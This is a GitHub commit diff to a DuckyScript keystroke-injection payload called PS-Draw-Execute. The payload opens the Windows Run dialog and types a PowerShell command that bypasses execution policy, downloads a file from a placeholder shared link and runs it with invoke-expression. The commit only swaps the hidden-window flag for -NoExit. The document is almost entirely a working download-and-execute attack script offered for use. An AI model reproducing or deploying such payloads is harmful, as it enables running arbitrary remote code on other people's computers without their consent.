Update PS-Draw-Execute

pull/35/head
I-Am-Jakoby 2022-04-28 02:48:55 -05:00 committed by GitHub
parent 7d5278c308
commit e35fc2e8b3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -5,5 +5,5 @@ REM Download one of the two PS-Draw Execute files provided and execute it
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
STRING powershell -NoExit -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER